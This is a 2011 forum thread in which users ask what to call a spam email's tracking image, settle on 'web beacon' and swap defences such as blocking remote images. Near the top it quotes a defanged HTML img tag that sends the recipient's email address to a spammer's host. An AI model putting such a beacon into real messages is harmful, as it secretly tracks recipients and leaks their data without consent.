lexicon: poisoned URL? web beacon?

NotBuyingIt
Posts: 6576
Joined: Fri Mar 11, 2011 6:21 pm

lexicon: poisoned URL? web beacon?

Post by NotBuyingIt » Mon Apr 04, 2011 6:12 pm

Spammers have a common and annoying habit of placing the following sort of spying code (derived from an actual case) in their email

Code: Select all

<img border="0" src="hXXp://BABBLEMENT.NET/c.asp?eid=spamee&#64;example.com">


As many will immediately recognize, the code causes the recipient's email address (e.g., spamee&#64;example.com) and IP address to be transmitted to the spammer's site (e.g., BABBLEMENT.NET) whenever the email is opened, without the recipient's knowledge or permission. The data may be profiled and used for additional spam or scams or perhaps even for identity theft. Agree?

I'm unfamiliar with the jargon. What is the best term to describe this sort of spying code? I've come across poisoned URL and web beacon, but I don't know if either term is correct. In a broader sense, it is a kind of browser exploit, I guess.

Swapfire
Posts: 295
Joined: Wed Mar 09, 2011 11:03 pm

RE: lexicon: poisoned URL? web beacon?

Post by Swapfire » Mon Apr 04, 2011 7:13 pm

I don't think this code would work on latest thunderbird and ms outlook (at least from 2003) since both won't load outside content (images too) from first time sender without owners permission. So it's not that terrifying. Thanks for letting know anyway. I didn't have an idea this is how it's actually done.

siblingshot
Posts: 875
Joined: Fri Jan 21, 2011 7:22 pm

RE: lexicon: poisoned URL? web beacon?

Post by siblingshot » Mon Apr 04, 2011 9:11 pm

@ NotBuyingIt

Interesting.

I knew image files could be utilized as a vehicle to transmit malicious code, but I did not know the same mechanism transmitted address and IP address back to the spammer on opening. Even in Gmail, I bar remote images from untrusted sources.

As to the defining jargon, I'd be interested to see it nailed down too.

EDIT:

:)

As for babblement.net, rated.

Guest

RE: lexicon: poisoned URL? web beacon?

Post by Guest » Mon Apr 04, 2011 10:55 pm

Doesn't work if email is read as text only = no HTML allowed.

and if I remember right the first e-mail client that used HTML by default was

TA-DA'
[url=http://en.wikipedia.org/wiki/Microsoft_Internet_Mail_and_News t=_self]Microsoft Internet Mail and News[/url]

I always setup up my e-mail clients to send and revieve message as text only

c۞g
Posts: 21225
Joined: Mon Jan 05, 2009 4:02 am

RE: lexicon: poisoned URL? web beacon?

Post by c۞g » Mon Apr 04, 2011 11:02 pm

http://en.wikipedia.org/wiki/Web_bug

Doesn't work if email is read as text only = no HTML allowed.

[edit]
babblement.net
redirects to:
unsubyourself.net

c۞g
Posts: 21225
Joined: Mon Jan 05, 2009 4:02 am

RE:e-mail clients

Post by c۞g » Mon Apr 04, 2011 11:04 pm

I use gmail
and have it configured not to display images

MysteryFCM
Posts: 4912
Joined: Mon Jul 14, 2008 4:47 pm

RE: lexicon: poisoned URL? web beacon?

Post by MysteryFCM » Mon Apr 04, 2011 11:18 pm

Correct term = beacon

NotBuyingIt
Posts: 6576
Joined: Fri Mar 11, 2011 6:21 pm

RE: lexicon: poisoned URL? web beacon?

Post by NotBuyingIt » Mon Apr 04, 2011 11:58 pm

Much thanks!

NotBuyingIt
Posts: 6576
Joined: Fri Mar 11, 2011 6:21 pm

RE: lexicon: poisoned URL? web beacon?

Post by NotBuyingIt » Tue Apr 05, 2011 12:13 am

After reading all of the relies to my question, I came across this:

http://en.wikipedia.org/wiki/Web_beacon

Thanks to all.

c۞g
Posts: 21225
Joined: Mon Jan 05, 2009 4:02 am

lexicon: off topic

Post by c۞g » Tue Apr 05, 2011 1:49 am

off topic; apologies

Lexicon - "specific dictionary"

would make an interesting Wiki contribution; WOT Lexicon (dictionary) related to WOt and it's functions, including security aspects.
Anyone willing and able?

Post Reply

Who is online

Users browsing this forum: No registered users and 4 guests